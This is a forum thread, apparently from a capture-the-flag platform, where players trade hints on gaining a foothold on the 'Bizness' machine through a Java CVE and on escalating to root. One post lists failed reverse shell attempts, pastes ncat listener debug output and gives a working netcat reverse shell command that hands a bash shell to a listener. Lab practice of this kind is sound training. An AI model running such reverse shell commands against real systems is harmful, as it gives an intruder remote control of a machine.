Official Bizness Discussion

alright im stuck, ill try some more tomorrow, good luck to you guys.

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GG. Hereā€™s to a new season. If anyone needs a hint, hit me up after the 24 hour mark.

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Did anyone get further with root? I found the stuff discussed here but it doesnā€™t seem to be it

Any hint 4 d root flag?

some hints? for root

Iā€™m also having difficulties on privesc. So many things feels to be off on this machine.
My guess is that something has to be done with that java environment but I really donā€™t know where to start from.

To get initial foothold Iā€™ve tried multiple different CVEā€™s -

The java one with the interface will execute a few commands like ls but even something as simple as cd it returns ā€œNot executed for security reasonā€.

Of course first I tried a barebones /dev/tcp bash reverse shell, that wouldnā€™t work.

A netcat reverse shell DID connect, and Iā€™ve tried searching to figure out what the issue is ā€“ the beginning of the connection looks like this but will not take a command:


Ncat: Version 7.93 ( Ncat - Netcat for the 21st Century )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::8080
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5

Looks like others have had the netcat issue and said it has something to do with the jdk version but it did the same thing for me with a python scriptā€¦?

EDIT #2:

For anyone having similar issues, it was NOT the CVE POC that was at fault for not giving me the shell. So here I learned to use full paths for your shell executeable.

not really a spoiler, but gives the specific reverse shell code that worked for me:

nc 9001 -e bash and MANY other reverse shell options wouldnā€™t work.

nc -e /bin/bash 9001 however worked perfectly!


Are you talking of the foothold ? Or the Privesc part ?

Still unable to get shell. PoC not working. Any suggestions?

If your POC doesnā€™t work well, try to find an other one on Github related to the CVE you identified

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edited post for clarity. talking about the initial foothold.

Can you please give any hint for privilege escalation?

Anyone any hint for privilege escalation please

Nice One :zap:


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Do I need to use tools like ysoserial for the foothold? canā€™t get it to work and donā€™t want to be wasting time. Thanks!

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502 Bad gateway ā€¦ :smiling_face_with_tear:

The CVEā€™s I found on Github requires a login page but I couldnā€™t found any on the website?

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Put it this way you donā€™t have to find the actual login form or tell it where it is.
There are python and java versions. Iā€™d suggest using one of the python versions and remember to always look at the code youā€™re running. It knows where the login endpoint is and you can easily find the form from there.

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